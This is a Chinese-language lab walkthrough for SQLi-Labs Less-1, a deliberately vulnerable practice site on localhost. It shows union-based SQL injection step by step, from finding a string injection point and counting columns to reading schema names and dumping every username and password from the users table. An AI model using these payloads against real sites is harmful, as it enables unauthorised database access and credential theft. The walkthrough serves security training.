1.访问SQLi-Labs网站
访问Less-1,并根据网页提示给定一个GET参数
http://127.0.0.1/sqli-labs/Less-1/?id=1
2.寻找注入点
分别使用以下3条payload寻找注入点及判断注入点的类型:
http://127.0.0.1/sqli-labs/Less-1/?id=1'
运行后报错!
http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1
运行后正常显示!
http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='2
运行后未正常显示!
由上述结果可以判断,网站存在字符型注入点。
3.判断网站查询的字段数(有几列)
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 1 --+
正常显示!
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 2 --+
正常显示!
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+
正常显示!
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 --+
报错!
由上述结果可以判断,网站查询的字段数为3。
4.判断网站的回显位置
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3 --+
由上可看出,2,3号位可以回显!
5.获取网站当前所在数据库的库名
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,database() --+
显示结果为security。
6.获取数据库的全部表名
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。
7.获取users表的全部字段名
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
显示结果,users表中有id、username和 password三个字段。
8.获取users表id、username和password字段的全部值
由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如
1)显示第一组数据
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1 --+
2)显示第二组数据
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 1,1 --+
以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。